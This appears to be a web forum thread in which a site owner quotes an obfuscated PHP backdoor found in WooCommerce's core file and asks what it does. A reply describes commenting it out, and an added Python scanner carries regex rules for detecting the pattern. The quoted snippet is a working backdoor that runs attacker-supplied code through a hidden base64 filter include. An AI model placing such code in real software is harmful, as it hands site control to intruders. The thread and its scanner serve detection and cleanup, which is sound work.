
Strange code being added to woocommerce.php file

I have found this strange code within the core woocommerce.php file.

Does anyone understand what this code is trying to do? I suspect it is malware as it is not part of the core WooCommerce code.

I am trying to understand if it is being added by a plugin and is legitimate or if it is some form of virus/malware etc.

if (isset($_POST["_aey8iousjrkdf"],$_POST['WP_6cdd22']) && sha1($_POST['WP_6cdd22']) == "6cdd22ad6267ba73cd92bf8abd7ec2058740fa80") {
    $_oxyu = tempnam(sys_get_temp_dir(),"rlgalfarg");
    file_put_contents($_oxyu,$_POST["_aey8iousjrkdf"]);
    require_once "php".":"."//filt"."e"."r/c"."onvert."."ba"."s"."e"."64-"."d"."e"."code/co"."n"."v"."er"."t.b"."a"."s"."e64-de"."co"."de/"."resou"."rce"."=".$_oxyu;
    unlink($_oxyu);
    die();
}

Had the same problem with this woocommerce.php. After removing the code it just kept returning straight back. After researching and playing around I think I've found the way. I have added /* just before "if" and all the code turned into just a comment. Now it is the second day and nothing new is returning to the place. Of course this is not the best way to do it and I'm not sure if it will stay as a comment, but so far it seems to be ok. If somebody can find a full removal way, please share with us here.
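Because the snippet returns after removal, something else on the site is rewriting the file, so the rest of the tree needs to be searched for the same pattern. The following is an added example, not part of the original question or answer: a Python scanner that joins split PHP string literals before matching, so the hidden `php://filter` include becomes searchable. The rule names, function names and sample strings are constructed for this illustration.

```python
import re
import sys
from pathlib import Path

# Matches the quote-dot-quote seam between two adjacent PHP string literals,
# so "php".":"."//filt" collapses to "php://filt".
_CONCAT = re.compile(r"""["']\s*\.\s*["']""")

# Heuristics taken from the traits of the snippet on this page (assumed names).
RULES = {
    "include-via-php-filter": re.compile(
        r"\b(?:require|include)(?:_once)?\b[^;]*php://filter", re.I),
    "base64-decode-filter": re.compile(r"convert\.base64-decode", re.I),
    "hash-gated-post": re.compile(
        r"\b(?:sha1|md5)\s*\(\s*\$_(?:POST|REQUEST|GET|COOKIE)\b", re.I),
    "post-body-written-to-file": re.compile(
        r"file_put_contents\s*\([^;]*\$_(?:POST|REQUEST)\b", re.I),
}

# Constructed samples: one imitating the split-string style, one ordinary include.
SAMPLE_OBFUSCATED = ('if (sha1($_POST["k"]) == "<hash>") { require_once "php".":"."//filt"'
                     '."er/conv"."ert.base"."64-de"."code/resource=".$tmp; }')
SAMPLE_CLEAN = 'require_once __DIR__ . "/includes/class-woocommerce.php";'

def collapse_concat(php_source):
    """Undo "a"."b" splitting so the wrapper string can be matched as one piece."""
    return _CONCAT.sub("", php_source)

def scan_source(php_source):
    """Return the sorted names of the rules that fire on one file's contents."""
    flat = collapse_concat(php_source)
    return sorted(name for name, rx in RULES.items() if rx.search(flat))

def scan_tree(root):
    """Map each .php file under root that triggers a rule to the rule names."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, rules in scan_tree(root).items():
        print(path, ", ".join(rules))
```

Run it against the WordPress root; a file that trips several rules at once deserves a diff against a clean copy of the same plugin or core version, while a single hit on its own needs manual review.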
